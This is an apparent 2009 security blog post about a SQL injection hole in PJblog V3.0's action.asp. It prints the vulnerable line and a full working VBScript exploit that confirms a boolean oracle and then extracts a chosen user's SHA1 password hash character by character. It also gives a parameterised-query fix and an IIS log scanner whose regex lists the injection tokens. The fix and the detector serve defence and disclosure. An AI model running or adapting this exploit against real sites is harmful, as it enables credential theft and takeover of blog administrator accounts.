夜火 Blog

PJblog V3.0 0day VBS exploit tool

2009-04-25
Category: Vulnerability information | Tags: PJblog, exploit

PJblog V3.0 0day VBS exploit tool. It was still a 0day when written, but the PJblog developers responded quickly and the hole has already been patched.

action.asp, line 14 (the value of the cname parameter is concatenated straight into the SQL text; a double quote in it terminates the string literal, so the remainder of the value is parsed as SQL):

strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
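The fix is to stop building the query from strings. The fragment below is an added example, not PJblog's own code: it keeps the vulnerable line from the page as a comment and shows the same lookup done with a bound ADO parameter, plus an input check in front of it. It assumes conn is an already-open ADODB.Connection to the blog's Access database, as action.asp uses it; the table blog_Content, the column log_cname and the "check_error" response token come from the page, while CheckAliasExists, IsValidAlias, the alias character class and the "check_ok" token are names chosen for this example.

```vbscript
<%
' Added example (not PJblog's code). Assumes "conn" is an open ADODB.Connection
' to the blog's Access database, exactly as action.asp on this page uses it.
Const adCmdText = 1
Const adVarWChar = 202
Const adParamInput = 1

' Vulnerable form from action.asp line 14: the raw cname value is spliced into
' the SQL text, so a double quote in it closes the string literal and whatever
' follows is parsed as SQL. That is the yes/no oracle the exploit relies on.
'   strcname=request("cname")
'   set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

' Hardened form: the same lookup with a bound parameter. The value reaches
' Jet/ADO as data, never as SQL text, so quotes inside it are just characters.
Function CheckAliasExists(conn, aliasName)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT COUNT(*) FROM blog_Content WHERE log_cname = ?"
    cmd.Parameters.Append cmd.CreateParameter("cname", adVarWChar, adParamInput, 255, aliasName)
    Set rs = cmd.Execute
    CheckAliasExists = (rs.Fields(0).Value > 0)
    rs.Close
    Set rs = Nothing
    Set cmd = Nothing
End Function

' Defence in depth: reject anything that cannot be a legal alias before
' touching the database. The character class is an assumption of this example.
Function IsValidAlias(aliasName)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_\-]{1,50}$"
    IsValidAlias = re.Test(aliasName)
End Function

strcname = Request("cname")
If Not IsValidAlias(strcname) Then
    Response.Write "check_error"   ' treat a malformed name as "not available"
ElseIf CheckAliasExists(conn, strcname) Then
    Response.Write "check_error"   ' token the page's IsSuccess() looks for: alias already taken
Else
    Response.Write "check_ok"      ' assumed success token of this example
End If
%>
```

With the parameterised query a value such as 0kee" or "1"="1 is compared literally against log_cname and simply does not match, so the boolean oracle disappears; the whitelist in front of it is a second, independent layer and also removes the odd error paths that quotes and control characters used to reach.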

For the full details of the vulnerability see http://0kee.com/read.php?tid-908.html

Exploit source (Exp.vbs):

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

' Confirm the oracle: a true condition and a false condition must give different answers
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

' Fetch a URL and return the response body as a string
Function PostData(PostUrl)
 Dim Http
 Set Http = CreateObject("msxml2.serverXMLHTTP")
 With Http
  .Open "GET",PostUrl,False
  .Send ()
  PostData = .ResponseBody
 End With
 Set Http = Nothing
 PostData =bytes2BSTR(PostData)
End Function

' Convert a raw byte array (ResponseBody) to a VBScript string
Function bytes2BSTR(vIn)
 Dim strReturn
 Dim I, ThisCharCode, NextCharCode
 strReturn = ""
 For I = 1 To LenB(vIn)
  ThisCharCode = AscB(MidB(vIn, I, 1))
  If ThisCharCode < &H80 Then
   strReturn = strReturn & Chr(ThisCharCode)
  Else
   NextCharCode = AscB(MidB(vIn, I + 1, 1))
   strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
   I = I + 1
  End If
 Next
 bytes2BSTR = strReturn
End Function

' True when the page answers "check_error", i.e. the injected query returned rows
Function IsSuccess(PostUrl)

strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 'let the target rest for a moment
End Function

Usage: Cscript.exe Exp.vbs <URL of the site to test> <username to test>
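From the defender's side the tool above leaves a very recognisable trace: a burst of GET requests to action.asp?action=checkAlias from one client, each with a cname value that closes the quoted string and continues with OR/AND or a subquery against blog_member, up to 17 requests per extracted character. The WSH script below is an added example, not part of the original post, that scans IIS W3C log lines for that shape and counts hits per client IP. The log lines are constructed for the example (the field order is the IIS 6 default W3C layout, with spaces in the query logged as "+"); the functions UrlDecode, IsHex, IsSuspicious and ScanLog are this example's own names. Run it with cscript.exe.

```vbscript
' Added example (not from the original post): flag PJblog checkAlias injection
' probes in IIS W3C log lines and count them per client IP.
Option Explicit

' Minimal %XX and "+" decoder so encoded quotes and spaces are not missed.
Function UrlDecode(s)
    Dim i, c, out
    out = ""
    i = 1
    Do While i <= Len(s)
        c = Mid(s, i, 1)
        If c = "+" Then
            out = out & " "
        ElseIf c = "%" And i + 2 <= Len(s) And IsHex(Mid(s, i + 1, 2)) Then
            out = out & Chr(CLng("&H" & Mid(s, i + 1, 2)))
            i = i + 2
        Else
            out = out & c
        End If
        i = i + 1
    Loop
    UrlDecode = out
End Function

Function IsHex(h)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9A-Fa-f]{2}$"
    IsHex = re.Test(h)
End Function

' Only the vulnerable endpoint and parameter matter. The tokens are the ones the
' exploit on this page builds: a closing double quote followed by OR/AND, or a
' COUNT(*) subquery against the member table.
Function IsSuspicious(uriStem, uriQuery)
    Dim q, re
    IsSuspicious = False
    If LCase(Right(uriStem, 10)) <> "action.asp" Then Exit Function
    q = LCase(UrlDecode(uriQuery))
    If InStr(q, "action=checkalias") = 0 Then Exit Function
    Set re = New RegExp
    re.Pattern = """\s*(or|and)\s|select\s+count\(\*\)|blog_member|mem_password"
    re.IgnoreCase = True
    IsSuspicious = re.Test(q)
End Function

' Returns a Dictionary of client IP -> number of suspicious requests.
' Fields (IIS 6 default): 0 date 1 time 2 s-ip 3 cs-method 4 cs-uri-stem
' 5 cs-uri-query 6 s-port 7 cs-username 8 c-ip ...
Function ScanLog(lines)
    Dim line, f, ip, hits
    Set hits = CreateObject("Scripting.Dictionary")
    For Each line In lines
        If Left(line, 1) <> "#" Then
            f = Split(line, " ")
            If UBound(f) >= 8 Then
                If IsSuspicious(f(4), f(5)) Then
                    ip = f(8)
                    If hits.Exists(ip) Then
                        hits.Item(ip) = hits.Item(ip) + 1
                    Else
                        hits.Add ip, 1
                    End If
                End If
            End If
        End If
    Next
    Set ScanLog = hits
End Function

' Constructed sample log: one normal alias check and two injection probes.
Dim sampleLog, result, key
sampleLog = Array( _
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status", _
    "2009-04-25 10:00:01 192.0.2.10 GET /action.asp action=checkAlias&cname=puterjam 80 - 198.51.100.7 Mozilla/4.0 200", _
    "2009-04-25 10:00:02 192.0.2.10 GET /action.asp action=checkAlias&cname=0kee""+or+""1""=""1 80 - 203.0.113.5 Mozilla/4.0 200", _
    "2009-04-25 10:00:02 192.0.2.10 GET /action.asp action=checkAlias&cname=0kee%22+Or+0%3C(Select+Count(*)+From+blog_member+Where+mem_password%3E=%270%27) 80 - 203.0.113.5 Mozilla/4.0 200")

Set result = ScanLog(sampleLog)
For Each key In result.Keys
    WScript.Echo "checkAlias injection probes from " & key & ": " & result.Item(key)
Next
```

On the sample above only 203.0.113.5 is reported, with two hits; the legitimate alias check from 198.51.100.7 is ignored because its cname carries no quote or SQL fragment. The count per IP is the useful signal: the extraction loop on this page issues up to 17 requests per character of the 40-character hash, so a real run shows hundreds of matches from one address within a few minutes. Detection only buys time, though; the query in action.asp still needs to be parameterised.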

Source: WEB Security Handbook (WEB安全手册)

Author: 夜火
Published: 2009-04-25